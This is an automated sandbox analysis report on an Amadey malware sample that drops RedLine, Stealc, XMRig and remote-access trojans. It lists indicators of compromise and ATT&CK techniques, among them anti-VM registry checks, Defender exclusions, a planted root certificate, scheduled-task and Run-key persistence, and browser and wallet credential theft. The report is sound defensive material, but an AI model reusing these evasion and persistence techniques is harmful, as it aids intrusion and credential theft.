amadey | 99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	7EhPCHLwVUzTFL9SfbnUelQh.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral1/files/0x0008000000023388-59.dat	family_redline
behavioral1/files/0x0008000000023385-54.dat	family_redline
behavioral1/memory/1208-68-0x0000000000510000-0x0000000000562000-memory.dmp	family_redline
behavioral1/memory/368-79-0x0000000000650000-0x0000000000710000-memory.dmp	family_redline
behavioral1/files/0x000900000002338e-107.dat	family_redline
behavioral1/memory/812-128-0x00000000004F0000-0x0000000000542000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc

XMRig Miner payload 4 IoCs

miner

resource	yara_rule
behavioral1/files/0x000700000002343e-441.dat	family_xmrig
behavioral1/files/0x000700000002343e-441.dat	xmrig
behavioral1/memory/5848-783-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/5848-782-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7EhPCHLwVUzTFL9SfbnUelQh.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplons.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1520	powershell.exe
3556	powershell.exe
5372	powershell.exe
5372	powershell.exe
2920	powershell.exe
3316	powershell.exe
2220	powershell.exe
5400	powershell.exe
5572	powershell.exe
5832	powershell.exe
5212	powershell.exe
6052	powershell.exe
5660	powershell.EXE
5276	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7EhPCHLwVUzTFL9SfbnUelQh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7EhPCHLwVUzTFL9SfbnUelQh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplons.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe

Checks computer location settings 2 TTPs 8 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	axplons.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	NewB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\International\Geo\Nation	taskmgr.exe

Executes dropped EXE 44 IoCs

pid	Process
2176	axplons.exe
316	alex.exe
368	trf.exe
1208	keks.exe
2848	gold.exe
812	redline1.exe
1152	install.exe
3820	GameService.exe
3852	GameService.exe
1064	GameService.exe
2632	GameService.exe
1084	GameService.exe
4956	GameSyncLink.exe
4540	753631.exe
4248	swizzhis.exe
1064	GameService.exe
1776	GameService.exe
1724	GameService.exe
4292	GameService.exe
4540	GameService.exe
2368	lumma1.exe
3144	PiercingNetLink.exe
4480	GameService.exe
1656	NewB.exe
2696	axplons.exe
1556	taskmgr.exe
3408	GameService.exe
2460	GameService.exe
1596	GameService.exe
2636	NewB.exe
4312	GameSyncLinks.exe
4200	file300un.exe
3912	350789.exe
4332	Cr8tgrigb93jSsG8dAiSbRvc.exe
1520	gnBvYBdk5otAi7W2JDiZ2A1N.exe
732	qoW1cc3lA1nTUNFRjDRTRosr.exe
1152	97ZQ5W9JRcOofRJeHJdny1qu.exe
4960	D48g6gzWyH8AkaodcKyWRpR6.exe
996	7EhPCHLwVUzTFL9SfbnUelQh.exe
4372	Install.exe
4804	FHdvWGF7ZGRXq7kekdXjARbr.exe
5284	dpoEmdz2XqDtLseWNP6gEmhw.exe
5348	Install.exe
5984	Install.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Software\Wine	99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe
Key opened	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Software\Wine	axplons.exe
Key opened	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Software\Wine	axplons.exe

Loads dropped DLL 3 IoCs

pid	Process
4540	753631.exe
2668	RegAsm.exe
2668	RegAsm.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000700000002347d-560.dat	themida
behavioral1/memory/996-566-0x0000000140000000-0x0000000140A55000-memory.dmp	themida
behavioral1/memory/996-646-0x0000000140000000-0x0000000140A55000-memory.dmp	themida

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5848-781-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5848-778-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5848-783-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5848-777-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5848-779-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5848-782-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/5848-780-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskmgr = "C:\\ProgramData\\taskmgr.exe"	taskmgr.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7EhPCHLwVUzTFL9SfbnUelQh.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
124	pastebin.com
122	pastebin.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
161	ipinfo.io
162	ipinfo.io
98	ip-api.com
159	api.myip.com
160	api.myip.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	7EhPCHLwVUzTFL9SfbnUelQh.exe
File opened for modification	C:\Windows\System32\GroupPolicy	7EhPCHLwVUzTFL9SfbnUelQh.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	7EhPCHLwVUzTFL9SfbnUelQh.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	7EhPCHLwVUzTFL9SfbnUelQh.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
4044	99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe
2176	axplons.exe
2696	axplons.exe
996	7EhPCHLwVUzTFL9SfbnUelQh.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 316 set thread context of 1740	316	alex.exe	98
PID 2848 set thread context of 4044	2848	gold.exe	108
PID 4248 set thread context of 2668	4248	swizzhis.exe	129
PID 2368 set thread context of 1292	2368	lumma1.exe	144
PID 4200 set thread context of 4264	4200	file300un.exe	180

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplons.job	99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe
File created	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe

Launches sc.exe 19 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4536	sc.exe
2848	sc.exe
5272	sc.exe
5312	sc.exe
5612	sc.exe
1876	sc.exe
5132	sc.exe
5580	sc.exe
5600	sc.exe
4808	sc.exe
6040	sc.exe
5568	sc.exe
4288	sc.exe
4104	sc.exe
1656	sc.exe
5900	sc.exe
1968	sc.exe
4904	sc.exe
4844	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5096	316	WerFault.exe	97

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
4336	schtasks.exe
5684	schtasks.exe
5344	schtasks.exe
5272	schtasks.exe
5924	schtasks.exe
5932	schtasks.exe
3668	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 48 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d7d0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	Install.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Install.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	Install.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	keks.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	keks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1556	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 53 IoCs

pid	Process
4044	99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe
4044	99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe
2176	axplons.exe
2176	axplons.exe
2668	RegAsm.exe
2668	RegAsm.exe
1208	keks.exe
1208	keks.exe
812	redline1.exe
812	redline1.exe
812	redline1.exe
812	redline1.exe
812	redline1.exe
812	redline1.exe
2696	axplons.exe
2696	axplons.exe
2668	RegAsm.exe
2668	RegAsm.exe
2920	powershell.exe
2920	powershell.exe
2920	powershell.exe
368	trf.exe
368	trf.exe
1208	keks.exe
1208	keks.exe
1208	keks.exe
1208	keks.exe
3316	powershell.exe
3316	powershell.exe
3316	powershell.exe
1520	powershell.exe
1520	powershell.exe
1520	powershell.exe
3556	powershell.exe
3556	powershell.exe
3556	powershell.exe
1556	taskmgr.exe
1556	taskmgr.exe
2220	powershell.exe
2220	powershell.exe
2220	powershell.exe
5400	powershell.exe
5400	powershell.exe
5400	powershell.exe
5572	powershell.exe
5572	powershell.exe
5572	powershell.exe
5832	powershell.exe
5832	powershell.exe
5832	powershell.exe
5212	powershell.exe
5212	powershell.exe
5212	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	368	trf.exe
Token: SeDebugPrivilege	1208	keks.exe
Token: SeDebugPrivilege	812	redline1.exe
Token: SeDebugPrivilege	1556	taskmgr.exe
Token: SeBackupPrivilege	368	trf.exe
Token: SeSecurityPrivilege	368	trf.exe
Token: SeSecurityPrivilege	368	trf.exe
Token: SeSecurityPrivilege	368	trf.exe
Token: SeSecurityPrivilege	368	trf.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	1740	RegAsm.exe
Token: SeDebugPrivilege	3316	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeLockMemoryPrivilege	3912	350789.exe
Token: SeDebugPrivilege	3556	powershell.exe
Token: SeDebugPrivilege	4264	CasPol.exe
Token: SeDebugPrivilege	1556	taskmgr.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeIncreaseQuotaPrivilege	5360	WMIC.exe
Token: SeSecurityPrivilege	5360	WMIC.exe
Token: SeTakeOwnershipPrivilege	5360	WMIC.exe
Token: SeLoadDriverPrivilege	5360	WMIC.exe
Token: SeSystemProfilePrivilege	5360	WMIC.exe
Token: SeSystemtimePrivilege	5360	WMIC.exe
Token: SeProfSingleProcessPrivilege	5360	WMIC.exe
Token: SeIncBasePriorityPrivilege	5360	WMIC.exe
Token: SeCreatePagefilePrivilege	5360	WMIC.exe
Token: SeBackupPrivilege	5360	WMIC.exe
Token: SeRestorePrivilege	5360	WMIC.exe
Token: SeShutdownPrivilege	5360	WMIC.exe
Token: SeDebugPrivilege	5360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5360	WMIC.exe
Token: SeRemoteShutdownPrivilege	5360	WMIC.exe
Token: SeUndockPrivilege	5360	WMIC.exe
Token: SeManageVolumePrivilege	5360	WMIC.exe
Token: 33	5360	WMIC.exe
Token: 34	5360	WMIC.exe
Token: 35	5360	WMIC.exe
Token: 36	5360	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5360	WMIC.exe
Token: SeSecurityPrivilege	5360	WMIC.exe
Token: SeTakeOwnershipPrivilege	5360	WMIC.exe
Token: SeLoadDriverPrivilege	5360	WMIC.exe
Token: SeSystemProfilePrivilege	5360	WMIC.exe
Token: SeSystemtimePrivilege	5360	WMIC.exe
Token: SeProfSingleProcessPrivilege	5360	WMIC.exe
Token: SeIncBasePriorityPrivilege	5360	WMIC.exe
Token: SeCreatePagefilePrivilege	5360	WMIC.exe
Token: SeBackupPrivilege	5360	WMIC.exe
Token: SeRestorePrivilege	5360	WMIC.exe
Token: SeShutdownPrivilege	5360	WMIC.exe
Token: SeDebugPrivilege	5360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5360	WMIC.exe
Token: SeRemoteShutdownPrivilege	5360	WMIC.exe
Token: SeUndockPrivilege	5360	WMIC.exe
Token: SeManageVolumePrivilege	5360	WMIC.exe
Token: 33	5360	WMIC.exe
Token: 34	5360	WMIC.exe
Token: 35	5360	WMIC.exe
Token: 36	5360	WMIC.exe
Token: SeDebugPrivilege	5400	powershell.exe
Token: SeDebugPrivilege	5572	powershell.exe
Token: SeDebugPrivilege	5832	powershell.exe
Token: SeDebugPrivilege	5212	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3912	350789.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1556	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4044 wrote to memory of 2176	4044	99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe	89
PID 4044 wrote to memory of 2176	4044	99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe	89
PID 4044 wrote to memory of 2176	4044	99903b5c677e5a17e5e9e4015b1fa5c5eb00a5df1da439e26949b1138337b680.exe	89
PID 2176 wrote to memory of 316	2176	axplons.exe	97
PID 2176 wrote to memory of 316	2176	axplons.exe	97
PID 2176 wrote to memory of 316	2176	axplons.exe	97
PID 316 wrote to memory of 1740	316	alex.exe	98
PID 316 wrote to memory of 1740	316	alex.exe	98
PID 316 wrote to memory of 1740	316	alex.exe	98
PID 316 wrote to memory of 1740	316	alex.exe	98
PID 316 wrote to memory of 1740	316	alex.exe	98
PID 316 wrote to memory of 1740	316	alex.exe	98
PID 316 wrote to memory of 1740	316	alex.exe	98
PID 316 wrote to memory of 1740	316	alex.exe	98
PID 1740 wrote to memory of 368	1740	RegAsm.exe	102
PID 1740 wrote to memory of 368	1740	RegAsm.exe	102
PID 1740 wrote to memory of 1208	1740	RegAsm.exe	103
PID 1740 wrote to memory of 1208	1740	RegAsm.exe	103
PID 1740 wrote to memory of 1208	1740	RegAsm.exe	103
PID 2176 wrote to memory of 2848	2176	axplons.exe	105
PID 2176 wrote to memory of 2848	2176	axplons.exe	105
PID 2176 wrote to memory of 2848	2176	axplons.exe	105
PID 2848 wrote to memory of 3820	2848	gold.exe	107
PID 2848 wrote to memory of 3820	2848	gold.exe	107
PID 2848 wrote to memory of 3820	2848	gold.exe	107
PID 2848 wrote to memory of 4044	2848	gold.exe	108
PID 2848 wrote to memory of 4044	2848	gold.exe	108
